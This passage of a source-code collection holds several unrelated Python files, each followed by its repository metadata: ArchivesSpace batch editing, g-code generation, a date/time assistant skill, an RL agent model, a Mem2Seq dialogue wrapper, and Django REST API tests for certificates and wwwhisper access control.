        if feature_ontology_pb2 is not None:
            return cls(feature_ontology_pb2)
        raise TypeError("Could not open ontology {}".format(ontology_file))
    def to_proto(self):
        """Serialize ontology. Only supports exporting in OntologyV2.
        Returns
        -------
        OntologyPb2
            Serialized ontology
        """
        return FeatureOntologyPb2(
            items=[
                FeatureOntologyItem(
                    name=name, id=feature_id, feature_value_type=self.id_to_feature_value_type[feature_id]
                ) for feature_id, name in self._id_to_name.items()
            ]
        )
    def save(self, save_dir):
        """Write out ontology items to `<sha>.json`. SHA generated from Ontology proto object.
        Parameters
        ----------
        save_dir: str
            Directory in which to save serialized ontology.
        Returns
        -------
        output_ontology_file: str
            Path to serialized ontology file.
        """
        os.makedirs(save_dir, exist_ok=True)
        return save_pbobject_as_json(self.to_proto(), save_path=save_dir)
    @property
    def num_classes(self):
        # Number of feature fields defined by this ontology.
        return len(self._feature_ids)
    @property
    def class_names(self):
        # Feature field names, ordered by ascending id.
        return self._feature_names
    @property
    def class_ids(self):
        # Sorted list of feature field ids.
        return self._feature_ids
    @property
    def name_to_id(self):
        # Mapping: feature field name -> id.
        return self._name_to_id
    @property
    def id_to_name(self):
        # Mapping: feature field id -> name.
        return self._id_to_name
    @property
    def id_to_feature_value_type(self):
        # Mapping: feature field id -> feature value type (proto enum).
        return self._id_to_feature_value_type
    @property
    def hexdigest(self):
        """Hash object"""
        return generate_uid_from_pbobject(self.to_proto())
    def __eq__(self, other):
        # Two ontologies are equal iff their serialized protos hash identically.
        return self.hexdigest == other.hexdigest
    def __repr__(self):
        return "{}[{}]".format(self.__class__.__name__, os.path.basename(self.hexdigest))
class AgentFeatureOntology(FeatureOntology):
    """Agent feature ontologies derive directly from Ontology (no extra behavior)."""
| 32.49635 | 120 | 0.659704 |
abdc66f427d245a23a8cd8f7219011f041e2e90d | 2,321 | py | Python | APIFunctions/replace_resources.py | cul/archivesspace | 9c088d4495cf1006c7d02ed2850224a9d28b35c1 | [
"MIT"
] | 4 | 2018-12-13T16:18:30.000Z | 2020-02-14T14:01:28.000Z | APIFunctions/replace_resources.py | cul/archivesspace | 9c088d4495cf1006c7d02ed2850224a9d28b35c1 | [
"MIT"
] | null | null | null | APIFunctions/replace_resources.py | cul/archivesspace | 9c088d4495cf1006c7d02ed2850224a9d28b35c1 | [
"MIT"
] | 2 | 2019-09-03T19:15:24.000Z | 2020-12-01T20:27:14.000Z | # Script to replace text in a designated field in a resource and post the resource back to API.
# Requirements:
# - ASFunctions.py
# - A csv of format repo,asid
# - sheetFeeder (optional, for reporting purposes)
import ASFunctions as asf
import json
from pprint import pprint
import re
import csv
from sheetFeeder import dataSheet
def main():
    """Batch search/replace in the `user_defined.string_2` field of a list of
    ArchivesSpace resources, saving a JSON backup of each original record and
    reporting before/after values to a Google Sheet.
    """
    asf.setServer('Test')
    # Google sheet used for reporting changes.
    the_report_sheet=dataSheet('1wNO0t2j5G9U0hUmb7E-jLd4T5skTs1aRxN7HrlyZwEI','resources!A:Z')
    id_file = 'resource_replacements.csv'
    output_folder = 'output/resource_replacements'
    # Read a list of repo and object ids (csv)
    the_ids = []
    ids = open(id_file)
    for row in csv.reader(ids):
        the_ids.append([row[0],row[1]])
    ids.close()
    # Search/replace patterns
    the_search_pattern = 'NCC'
    the_replace_pattern = 'NNC'
    the_before_afters = []
    the_heads = ['repo', 'asid','before', 'after']
    the_before_afters.append(the_heads)
    for an_obj in the_ids:
        out_path = output_folder + '/' + an_obj[0] + '_' + an_obj[1] + '_old.json'
        # read from API
        x = asf.getResource(an_obj[0],an_obj[1])
        # Save copy of existing object
        print('Saving data to ' + out_path + '....')
        f = open(out_path, "w+")
        f.write(x)
        f.close()
        x = json.loads(x)
        the_old_field_data = x['user_defined']['string_2']
        # NOTE(review): y aliases the same dict as x (not a copy); the
        # original field value was captured above before mutation.
        y = x
        y['user_defined']['string_2'] = re.sub(the_search_pattern, the_replace_pattern, x['user_defined']['string_2'])
        if y['user_defined']['string_2'] == the_old_field_data:
            the_new_field_data = "[no change]"
        else:
            the_new_field_data = y['user_defined']['string_2']
        the_before_afters.append([an_obj[0], an_obj[1], '{string_2} ' + the_old_field_data, '{string_2} ' + the_new_field_data ])
        # convert dict back to json for posting.
        z = json.dumps(y)
        # Post the fixed object back to API.
        post = asf.postResource(an_obj[0], an_obj[1], z)
        print(post)
    # Report changes to Google Sheet
    print('Writing before/after info to sheet...')
    the_report_sheet.clear()
    the_report_sheet.appendData(the_before_afters)
main()
| 22.980198 | 129 | 0.637225 |
abde163a27adea2e134a7e338567ffa9749d3d5e | 1,139 | py | Python | db25_hole_plate/cnc/boundary.py | iorodeo/panels_mpja_1u | 6d3a44150b41d25457041b9246be11b1778112bc | [
"Apache-2.0"
] | 1 | 2020-07-23T19:04:06.000Z | 2020-07-23T19:04:06.000Z | db25_hole_plate/cnc/boundary.py | iorodeo/panels_mpja_1u | 6d3a44150b41d25457041b9246be11b1778112bc | [
"Apache-2.0"
] | null | null | null | db25_hole_plate/cnc/boundary.py | iorodeo/panels_mpja_1u | 6d3a44150b41d25457041b9246be11b1778112bc | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import os
import sys
from py2gcode import gcode_cmd
from py2gcode import cnc_dxf
fileName = sys.argv[1]
feedrate = 120.0
prog = gcode_cmd.GCodeProg()
prog.add(gcode_cmd.GenericStart())
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.FeedRate(feedrate))
prog.add(gcode_cmd.PathBlendMode(p=0.02,q=0.01))
layerNames = ['boundary']
param = {
'fileName' : fileName,
'layers' : layerNames,
'depth' : 0.09,
'startZ' : 0.0,
'safeZ' : 0.3,
'toolDiam' : 0.125,
'direction' : 'ccw',
'cutterComp' : 'outside',
'maxCutDepth' : 0.12,
'startDwell' : 2.0,
'startCond' : 'minX',
'maxArcLen' : 1.0e-2,
'ptEquivTol' : 1.0e-5,
}
boundary = cnc_dxf.DxfBoundary(param)
prog.add(boundary)
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.ExactPathMode())
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.End(),comment=True)
baseName, dummy = os.path.splitext(__file__)
fileName = '{0}.ngc'.format(baseName)
print('generating: {0}'.format(fileName))
prog.write(fileName)
| 25.311111 | 48 | 0.624232 |
abde3c4b3322bc497127bee1536c6ca6039746ca | 852 | py | Python | packages/sia/datetime.py | varunsrivatsa/Sia | c5fc99f357138cfbcf050277f1aa201048cd26f4 | [
"MIT"
] | 3 | 2022-01-28T17:51:05.000Z | 2022-03-25T14:57:52.000Z | packages/sia/datetime.py | varunsrivatsa/Sia | c5fc99f357138cfbcf050277f1aa201048cd26f4 | [
"MIT"
] | 19 | 2022-01-16T08:23:52.000Z | 2022-03-18T22:27:02.000Z | packages/sia/datetime.py | varunsrivatsa/Sia | c5fc99f357138cfbcf050277f1aa201048cd26f4 | [
"MIT"
] | 1 | 2022-03-09T06:23:42.000Z | 2022-03-09T06:23:42.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import utils
from datetime import datetime
import calendar
def run(string, entities):
    """Sia tells time and date.

    Branch order matters: queries mentioning only "time" or only "date"
    are answered first, then "day", then queries mentioning both "time"
    and "date". Returns None when nothing matches.
    """
    query = string.lower()
    now = datetime.now()
    today = datetime.today()
    has_time = "time" in query
    has_date = "date" in query
    if has_time and not has_date:
        return utils.output('end', 'datetime', "Time is " + now.strftime("%I:%M %p"))
    if has_date and not has_time:
        return utils.output('end', 'datetime', now.strftime("%B %d, %Y"))
    if "day" in query:
        return utils.output('end', 'datetime', "Today is " + calendar.day_name[today.weekday()])
    if has_time and has_date:
        return utils.output('end', 'datetime', "Today's " + now.strftime(" date is %d-%m-%Y, and time is %I:%M %p"))
abdf820c98b1659e30fa822be8c125f87ed89cc6 | 1,477 | py | Python | python/rl_agent/model.py | iShohei220/Grounded-Language-Learning-in-Pytorch | 75859829258dd33d4a75f79dc9348a1671a68b81 | [
"CC-BY-4.0"
] | null | null | null | python/rl_agent/model.py | iShohei220/Grounded-Language-Learning-in-Pytorch | 75859829258dd33d4a75f79dc9348a1671a68b81 | [
"CC-BY-4.0"
] | null | null | null | python/rl_agent/model.py | iShohei220/Grounded-Language-Learning-in-Pytorch | 75859829258dd33d4a75f79dc9348a1671a68b81 | [
"CC-BY-4.0"
] | 1 | 2021-01-16T19:53:55.000Z | 2021-01-16T19:53:55.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torch.optim as optim
import numpy as np
from collections import namedtuple
from network_modules import *
State = namedtuple('State', ('visual', 'instruction'))
class Model(nn.Module):
def __init__(self, action_space):
super(Model, self).__init__()
# Core modules
self.vision_m = Vision_M()
self.language_m = Language_M()
self.mixing_m = Mixing_M()
self.action_m = Action_M()
# Action selection and Value Critic
self.policy = Policy(action_space=action_space)
# Auxiliary networks
self.tAE = temporal_AutoEncoder(self.policy, self.vision_m)
self.language_predictor = Language_Prediction(self.language_m)
self.reward_predictor = RewardPredictor(self.vision_m, self.language_m, self.mixing_m)
def forward(self, x):
'''
Argument:
img: environment image, shape [batch_size, 84, 84, 3]
instruction: natural language instruction [batch_size, seq]
'''
vision_out = self.vision_m(x.visual)
language_out = self.language_m(x.instruction)
mix_out = self.mixing_m(vision_out, language_out)
action_out = self.action_m(mix_out)
action_prob, value = self.policy(action_out)
return action_prob, value | 31.425532 | 94 | 0.641842 |
abe247f69531769f09c500de2ab3ea0c0fe0c0ac | 6,939 | py | Python | rr/tests/api/test_views_api_certificate.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null | rr/tests/api/test_views_api_certificate.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | 1 | 2020-08-10T13:16:58.000Z | 2020-08-18T06:30:20.000Z | rr/tests/api/test_views_api_certificate.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null | from django.contrib.auth.models import User
from rest_framework import status
from rest_framework.test import APIRequestFactory
from rr.models.certificate import Certificate
from rr.models.serviceprovider import ServiceProvider
from rr.tests.api.api_common import APITestCase
from rr.views_api.certificate import CertificateViewSet
class CertificateTestCase(APITestCase):
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.create(username='tester')
self.superuser = User.objects.create(username='superuser', is_superuser=True)
self.user_sp = ServiceProvider.objects.create(entity_id='https://sp2.example.org/sp', service_type='saml',
name_en='My Test')
self.user_sp.admins.add(self.user)
self.admin_sp = ServiceProvider.objects.create(entity_id='test:entity:1', service_type='saml')
self.valid_certificate = """MIIFBTCCAu2gAwIBAgIJAKOceIf3koqXMA0GCSqGSIb3DQEBCwUAMBkxFzAVBgNV
BAMMDnNwLmV4YW1wbGUub3JnMB4XDTE4MDExNjExMTAxN1oXDTI4MDExNDExMTAx
N1owGTEXMBUGA1UEAwwOc3AuZXhhbXBsZS5vcmcwggIiMA0GCSqGSIb3DQEBAQUA
A4ICDwAwggIKAoICAQDlomqiyCbu1nKL9BtTwFjuNr0O2iDrQ1DbOnMu6E3tg0CO
kvmxzy7e9RuVzJUzz4bCz5u7xoHAFzaOX/k0FwRp32k9//4KNiioZta+sOE5ewyi
9ooOxqYtBMC7xy4AF/+7U2XoeGvdPPswUjEB0b312K4Xu3tvQy4ZdDhIiIHizLng
bHOUX8Isq50z8PmSEPE/DMMfK4mvfSMT067fC6tX+WHjlb8PHgEBn09f8kL76+x6
JLm6uGPN2M0lL1mtoN3lumYxldifsf2REuZdVSQYGRqQWjvMDJCPy1NRyvUHRDRr
FWIgEJhSpp0PdLd+9oK4Wccw8L2PN/khpXAJAVrAuMrOzASWL+ZuCQbUHSoK0Asb
4eN5jgDBNU63P/Ev4//JaUwNmYWMSeqEEKzun0WansZFC2LUkVjvuSZ2JV4bzu+s
pRdj0dkEa5HOhk7Bvd/eN0h2aVLsF3EgXekDudbKXMwQOxrazJoVHv9pwxsZxlHK
LP298175K/skR8VASQdH3JBrXpdiDb4mLoyXdx/I11Tx13fuiQogIRcm6ccqy/Ob
1nFzh1tkqTaFJF2F3cLCpbrqv853vWC08bRACkIeJQ8R8EDJudvk3cQllHHfItss
yoR//TcHJXsu+zwTruW6wdLkXShG3v2N2zplChuUczFYOT1FjZa+hRhk8p6tOwID
AQABo1AwTjAdBgNVHQ4EFgQU2TjrYXoZH0JkPA3YIZe+H0v1jqcwHwYDVR0jBBgw
FoAU2TjrYXoZH0JkPA3YIZe+H0v1jqcwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0B
AQsFAAOCAgEAJUjWKsLdtVI5xqfi7RLk1viyTdvKi2sTkXgKySNPffwRLoEcmIAp
FPX0TAhsoBdxE7OFwlSmb6ZX89CtNlwyyVHlWemwgKNfjdgj0qkk7Lreq+L1si6j
diml6uFfMbZrHtppxHENDYckxxfD3Zooa/pY9NUG17BHzoNTAsDhFq7YCA4Y2j6h
acYh1pa0PQ4rhE2zhFs3AZF+gaYGdwtKEcJBEQ6OcctP3Y8K/FTDmJAK3dERdmrh
BdeYSRTQSQMm0W1SsIsEMEfndC1Cca/aKrl8B1tZz55s04WPx/e92NV9S5KGRH0G
UADycvLo12NUfqubK+2+bcH92rhHZ1QGjkfJmHwhXIqt8F1gysQQO+M3uYhlpiIR
4vQBWFqoMCT7lqQYj1tCvrt6+RVv3Zz8t0eMfJXSFAoJPbjv3npPcUfjmLRG7W9y
VSb6gzk3PYRVB0NzmlPdB4KFdBQbsuE8qoPr3UBbHIiD9wFU6K6eUZkIjqIV/5az
56c2mntFDpdx+46RkS/7CEAbZkD8kEM5vrhpDXhbfLzIDTnOTBTbrwGmPCnpYSXy
rKLt+NcwtbkI6weLISJu9lFZnPMYT7LpqDWD4aMHHUWr8THO0T6mbCeQRYMlfSpU
0es8zIhYt2fRbxHFRIFyRZYJrQoSfkU5OMas/ypz/q2wOvgqjH8qyRQ=
"""
self.object = Certificate.objects.add_certificate(certificate=self.valid_certificate,
sp=self.user_sp,
encryption=False,
signing=True)
self.superuser_object = Certificate.objects.add_certificate(certificate=self.valid_certificate,
sp=self.admin_sp,
encryption=False,
signing=False)
self.data = {'id': self.object.id,
'sp': self.object.sp.id,
'certificate': self.object.certificate,
'signing': self.object.signing,
'encryption': self.object.encryption}
self.create_data = {'sp': self.object.sp.id,
'certificate': self.valid_certificate,
'signing': True,
'encryption': True}
self.create_error_data = {'sp': self.object.sp.id,
'certificate': self.valid_certificate[:-20],
'signing': True,
'encryption': True}
self.url = '/api/v1/certificates/'
self.viewset = CertificateViewSet
self.model = Certificate
def test_certificate_access_list_without_user(self):
response = self._test_list(user=None)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_certificate_access_list_with_normal_user(self):
response = self._test_list(user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), 1)
def test_certificate_access_list_with_superuser(self):
response = self._test_list(user=self.superuser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), 2)
def test_certificate_access_object_without_user(self):
response = self._test_access(user=None, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_certificate_access_object_with_normal_user(self):
response = self._test_access(user=self.user, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_certificate_access_object_with_normal_user_without_permission(self):
response = self._test_access(user=self.user, pk=self.superuser_object.pk)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_certificate_access_object_with_superuser(self):
response = self._test_access(user=self.user, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_certificate_create_with_user(self):
response = self._test_create(user=self.user, data=self.create_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
for key in self.create_data:
self.assertEqual(response.data[key], self.create_data[key])
def test_certificate_create_error_with_user(self):
response = self._test_create(user=self.user, data=self.create_error_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_certificate_delete_with_user(self):
response = self._test_delete(user=self.user, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNotNone(Certificate.objects.get(pk=self.object.pk).end_at)
def test_certificate_delete_with_user_without_permission(self):
response = self._test_delete(user=self.user, pk=self.superuser_object.pk)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
| 55.071429 | 114 | 0.724024 |
abe24ac8d4f36a5234b583961dedd7e2bc567ce6 | 2,298 | py | Python | convlab/modules/e2e/multiwoz/Mem2Seq/Mem2Seq.py | ngduyanhece/ConvLab | a04582a77537c1a706fbf64715baa9ad0be1301a | [
"MIT"
] | 405 | 2019-06-17T05:38:47.000Z | 2022-03-29T15:16:51.000Z | convlab/modules/e2e/multiwoz/Mem2Seq/Mem2Seq.py | ngduyanhece/ConvLab | a04582a77537c1a706fbf64715baa9ad0be1301a | [
"MIT"
] | 69 | 2019-06-20T22:57:41.000Z | 2022-03-04T12:12:07.000Z | convlab/modules/e2e/multiwoz/Mem2Seq/Mem2Seq.py | ngduyanhece/ConvLab | a04582a77537c1a706fbf64715baa9ad0be1301a | [
"MIT"
] | 124 | 2019-06-17T05:11:23.000Z | 2021-12-31T05:58:18.000Z | # -*- coding: utf-8 -*-
# Modified by Microsoft Corporation.
# Licensed under the MIT license.
"""
"""
import numpy as np
import torch
from nltk import word_tokenize
from .models.Mem2Seq import Mem2Seq
from .utils.config import args, USE_CUDA, UNK_token
from .utils.utils_woz_mem2seq import prepare_data_seq, generate_memory, MEM_TOKEN_SIZE
def plain2tensor(word2index, memory):
src_seqs = []
for token in memory:
src_seq = []
for word in token:
if word in word2index:
src_seq.append(word2index[word])
else:
src_seq.append(UNK_token)
src_seqs.append([src_seq])
return torch.LongTensor(src_seqs).cuda() if USE_CUDA else torch.LongTensor(src_seqs)
def denormalize(uttr):
uttr = uttr.replace(' -s', 's')
uttr = uttr.replace(' -ly', 'ly')
uttr = uttr.replace(' -er', 'er')
return uttr
class Mem2seq:
def __init__(self):
directory = args['path'].split("/")
task = directory[-1].split('HDD')[0]
HDD = directory[-1].split('HDD')[1].split('BSZ')[0]
L = directory[-1].split('L')[1].split('lr')[0]
_, _, _, _, self.lang, max_len, max_r = prepare_data_seq(task, batch_size=1)
self.model = Mem2Seq(int(HDD),max_len,max_r,self.lang,args['path'],task, lr=0.0, n_layers=int(L), dropout=0.0, unk_mask=0)
self.reset()
def reset(self):
self.t = 0
self.memory = []
def predict(self, query):
usr = query
print('Mem2Seq usr:', usr)
#example input: 'please find a restaurant called nusha .'
self.t += 1
print('Mem2Seq turn:', self.t)
usr = ' '.join(word_tokenize(usr.lower()))
self.memory += generate_memory(usr, '$u', self.t)
src_plain = (self.memory+[['$$$$']*MEM_TOKEN_SIZE],)
src_seqs = plain2tensor(self.lang.word2index, src_plain[0])
words = self.model.evaluate_batch(1, src_seqs, [len(src_plain[0])], None, None, None, None, src_plain)
row = np.transpose(words)[0].tolist()
if '<EOS>' in row:
row = row[:row.index('<EOS>')]
sys = ' '.join(row)
sys = denormalize(sys)
print('Mem2Seq sys:', sys)
self.memory += generate_memory(sys, '$s', self.t)
return sys
| 33.304348 | 130 | 0.597476 |
abe3cbe49477fe37d4fc16249de8a10f4fb4a013 | 18 | py | Python | mit_semseg/lib/utils/__init__.py | starkgines/PDI | dd6908c022179f935ae25d3afee9ea44bb49f162 | [
"BSD-3-Clause"
] | 4,303 | 2018-04-08T00:48:44.000Z | 2022-03-31T12:54:08.000Z | mit_semseg/lib/utils/__init__.py | starkgines/PDI | dd6908c022179f935ae25d3afee9ea44bb49f162 | [
"BSD-3-Clause"
] | 212 | 2018-04-08T16:02:59.000Z | 2022-03-16T14:52:44.000Z | mit_semseg/lib/utils/__init__.py | starkgines/PDI | dd6908c022179f935ae25d3afee9ea44bb49f162 | [
"BSD-3-Clause"
] | 1,057 | 2018-04-08T03:29:26.000Z | 2022-03-30T17:36:12.000Z | from .th import *
| 9 | 17 | 0.666667 |
abe581f27ace8a8b0cd1d152b02ba112d26b24bc | 21,754 | py | Python | wwwhisper_admin/tests/tests_views.py | wrr/wwwhisper | 38a55dd9c828fbb1b5a8234ea3ddf2242e684983 | [
"MIT"
] | 54 | 2015-01-19T23:49:39.000Z | 2021-02-18T01:14:51.000Z | wwwhisper_admin/tests/tests_views.py | wrr/wwwhisper | 38a55dd9c828fbb1b5a8234ea3ddf2242e684983 | [
"MIT"
] | 13 | 2015-01-26T14:51:10.000Z | 2020-11-10T04:15:36.000Z | wwwhisper_admin/tests/tests_views.py | wrr/wwwhisper | 38a55dd9c828fbb1b5a8234ea3ddf2242e684983 | [
"MIT"
] | 11 | 2015-07-25T02:13:12.000Z | 2021-07-10T14:11:46.000Z | # wwwhisper - web access control.
# Copyright (C) 2012-2018 Jan Wrobel <jan@mixedbit.org>
from wwwhisper_auth.models import Site
from wwwhisper_auth.tests.utils import HttpTestCase
from wwwhisper_auth.tests.utils import TEST_SITE
import json
FAKE_UUID = '41be0192-0fcc-4a9c-935d-69243b75533c'
TEST_USER_EMAIL = 'foo@bar.org'
TEST_LOCATION = '/pub/kika/'
TEST_ALIAS = 'https://foo.example.org'
def uid_regexp():
    """Regexp fragment matching the 36-character uuid part of a urn."""
    return '[0-9a-z-]{36}'
def extract_uuid(urn):
    """Strip the 'urn:uuid:' prefix from *urn* (no-op if absent)."""
    bare_uuid = urn.replace('urn:uuid:', '')
    return bare_uuid
class AdminViewTestCase(HttpTestCase):
    """Shared helpers for admin API tests: create model objects via POST."""

    def _post_created(self, url, payload):
        # POST payload to url, assert 201 Created, return the parsed JSON body.
        response = self.post(url, payload)
        self.assertEqual(201, response.status_code)
        return json.loads(response.content)

    def add_user(self, user_name=TEST_USER_EMAIL):
        """Create a user and return its JSON representation."""
        return self._post_created('/wwwhisper/admin/api/users/',
                                  {'email' : user_name})

    def add_location(self):
        """Create the test location and return its JSON representation."""
        return self._post_created('/wwwhisper/admin/api/locations/',
                                  {'path' : TEST_LOCATION})

    def add_alias(self):
        """Create the test alias and return its JSON representation."""
        return self._post_created('/wwwhisper/admin/api/aliases/',
                                  {'url' : TEST_ALIAS})
class UserTest(AdminViewTestCase):
    """Tests for the /wwwhisper/admin/api/users/ REST endpoints."""

    def test_add_user(self):
        """POST creates a user and returns its uuid-based resource URLs."""
        response = self.post('/wwwhisper/admin/api/users/',
                             {'email' : TEST_USER_EMAIL})
        self.assertEqual(201, response.status_code)
        parsed_response_body = json.loads(response.content)
        user_uuid = extract_uuid(parsed_response_body['id'])
        self.assertRegexpMatches(parsed_response_body['id'],
                                 '^urn:uuid:%s$' % uid_regexp())
        self.assertEqual(TEST_USER_EMAIL, parsed_response_body['email'])
        self_url = '%s/wwwhisper/admin/api/users/%s/' % (TEST_SITE, user_uuid)
        self.assertEqual(self_url, parsed_response_body['self'])
        # Location and Content-Location headers must point at the new resource.
        self.assertEqual(self_url, response['Location'])
        self.assertEqual(self_url, response['Content-Location'])

    def test_get_user(self):
        """GET on a user's self URL returns the same representation as POST."""
        parsed_add_user_response_body = self.add_user()
        get_response = self.get(parsed_add_user_response_body['self'])
        self.assertEqual(200, get_response.status_code)
        parsed_get_response_body = json.loads(get_response.content)
        self.assertEqual(parsed_add_user_response_body,
                         parsed_get_response_body)

    def test_delete_user(self):
        """DELETE removes the user; a subsequent GET returns 404."""
        user_url = self.add_user()['self']
        self.assertEqual(204, self.delete(user_url).status_code)
        self.assertEqual(404, self.get(user_url).status_code)

    def test_get_users_list(self):
        """The collection resource lists all created users."""
        self.assertEqual(201, self.post('/wwwhisper/admin/api/users/',
                                        {'email' : 'foo@bar.org'}).status_code)
        self.assertEqual(201, self.post('/wwwhisper/admin/api/users/',
                                        {'email' : 'baz@bar.org'}).status_code)
        self.assertEqual(201, self.post('/wwwhisper/admin/api/users/',
                                        {'email' : 'boo@bar.org'}).status_code)
        response = self.get('/wwwhisper/admin/api/users/')
        self.assertEqual(200, response.status_code)
        parsed_response_body = json.loads(response.content)
        self.assertEqual('%s/wwwhisper/admin/api/users/' % TEST_SITE,
                         parsed_response_body['self'])
        users = parsed_response_body['users']
        self.assertEqual(3, len(users))
        self.assertItemsEqual(['foo@bar.org', 'baz@bar.org', 'boo@bar.org'],
                              [item['email'] for item in users])

    def test_get_not_existing_user(self):
        """GET with an unknown uuid returns 404 with an explanation."""
        response = self.get('/wwwhisper/admin/api/users/%s/' % FAKE_UUID)
        self.assertEqual(404, response.status_code)
        self.assertRegexpMatches(response.content, 'User not found')

    def test_add_user_invalid_email(self):
        """POST with a malformed email address is rejected with 400."""
        response = self.post('/wwwhisper/admin/api/users/',
                             {'email' : 'foo.bar'})
        self.assertEqual(400, response.status_code)
        self.assertRegexpMatches(response.content, 'Invalid email format')

    def test_add_existing_user(self):
        """Adding the same email twice is rejected with 400."""
        self.add_user()
        response = self.post('/wwwhisper/admin/api/users/',
                             {'email' : TEST_USER_EMAIL})
        self.assertEqual(400, response.status_code)
        self.assertRegexpMatches(response.content, 'User already exists')

    def test_delete_user_twice(self):
        """The second DELETE of the same user returns 404."""
        user_url = self.add_user()['self']
        response = self.delete(user_url)
        self.assertEqual(204, response.status_code)
        response = self.delete(user_url)
        self.assertEqual(404, response.status_code)
        self.assertRegexpMatches(response.content, 'User not found')

    def test_users_limit(self):
        """Creating more users than Site.users_limit allows fails with 400."""
        limit = 8
        # Bugfix: the limit is set on the Site *class*, so previously the
        # lowered value leaked into every test executed afterwards.
        # Save and restore it so this test is self-contained.
        original_limit = Site.users_limit
        self.addCleanup(setattr, Site, 'users_limit', original_limit)
        Site.users_limit = limit
        for i in range(0, limit):
            email = '%s%d' % (TEST_USER_EMAIL, i)
            response = self.post('/wwwhisper/admin/api/users/',
                                 {'email' : email})
            self.assertEqual(201, response.status_code)
        email = '%s%d' % (TEST_USER_EMAIL, limit)
        response = self.post('/wwwhisper/admin/api/users/',
                             {'email' : email})
        self.assertEqual(400, response.status_code)
        self.assertRegexpMatches(response.content, 'Users limit exceeded')
class LocationTest(AdminViewTestCase):
def test_add_location(self):
response = self.post('/wwwhisper/admin/api/locations/',
{'path' : TEST_LOCATION})
self.assertEqual(201, response.status_code)
parsed_response_body = json.loads(response.content)
location_uuid = extract_uuid(parsed_response_body['id'])
self.assertRegexpMatches(parsed_response_body['id'],
'^urn:uuid:%s$' % uid_regexp())
self.assertEqual(TEST_LOCATION, parsed_response_body['path'])
self.assertTrue('openAccess' not in parsed_response_body)
self_url = '{0}/wwwhisper/admin/api/locations/{1}/'.format(
TEST_SITE, location_uuid)
self.assertEqual(self_url, parsed_response_body['self'])
self.assertEqual(self_url, response['Location'])
self.assertEqual(self_url, response['Content-Location'])
def test_get_location(self):
parsed_add_location_response_body = self.add_location()
get_response = self.get(parsed_add_location_response_body['self'])
self.assertEqual(200, get_response.status_code)
parsed_get_response_body = json.loads(get_response.content)
self.assertEqual(parsed_add_location_response_body,
parsed_get_response_body)
def test_grant_open_access_to_location(self):
location = self.add_location()
self.assertTrue('openAccess' not in location)
open_access_url = location['self'] + 'open-access/'
put_response = self.put(open_access_url)
parsed_response_body = json.loads(put_response.content)
self.assertEqual(201, put_response.status_code)
self.assertEqual(open_access_url, put_response['Location'])
self.assertEqual(open_access_url, parsed_response_body['self'])
# Get location again and make sure openAccess attribute is now true.
location = json.loads(self.get(location['self']).content)
self.assertTrue('openAccess' in location)
def test_grant_open_access_to_location_if_already_granted(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
put_response1 = self.put(open_access_url)
put_response2 = self.put(open_access_url)
self.assertEqual(200, put_response2.status_code)
self.assertFalse(put_response2.has_header('Location'))
self.assertEqual(put_response1.content, put_response2.content)
def test_check_open_access_to_location(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
self.put(open_access_url)
get_response = self.get(open_access_url)
parsed_response_body = json.loads(get_response.content)
self.assertEqual(200, get_response.status_code)
self.assertEqual(open_access_url, parsed_response_body['self'])
def test_revoke_open_access_to_location(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
self.put(open_access_url)
delete_response = self.delete(open_access_url)
self.assertEqual(204, delete_response.status_code)
get_response = self.get(open_access_url)
self.assertEqual(404, get_response.status_code)
def test_revoke_open_access_to_location_if_already_revoked(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
self.put(open_access_url)
self.delete(open_access_url)
delete_response = self.delete(open_access_url)
self.assertEqual(404, delete_response.status_code)
def test_delete_location(self):
    """A deleted location answers 204 on DELETE and 404 on later GETs."""
    url = self.add_location()['self']
    self.assertEqual(204, self.delete(url).status_code)
    self.assertEqual(404, self.get(url).status_code)
def test_get_locations_list(self):
    """The locations collection lists every location that was added."""
    paths = ['/foo/bar', '/baz/bar', '/boo/bar/']
    for path in paths:
        response = self.post('/wwwhisper/admin/api/locations/',
                             {'path' : path})
        self.assertEqual(201, response.status_code)
    response = self.get('/wwwhisper/admin/api/locations/')
    self.assertEqual(200, response.status_code)
    body = json.loads(response.content)
    self.assertEquals('%s/wwwhisper/admin/api/locations/' % TEST_SITE,
                      body['self'])
    locations = body['locations']
    self.assertEqual(3, len(locations))
    self.assertItemsEqual(paths, [item['path'] for item in locations])
def test_get_not_existing_location(self):
    """Fetching an unknown location UUID gives 404 with an explanation."""
    resp = self.get('/wwwhisper/admin/api/locations/%s/' % FAKE_UUID)
    self.assertEqual(404, resp.status_code)
    self.assertRegexpMatches(resp.content, 'Location not found')
def test_add_location_invalid_path(self):
    """A non-normalized path (contains '..') is rejected with 400."""
    resp = self.post('/wwwhisper/admin/api/locations/',
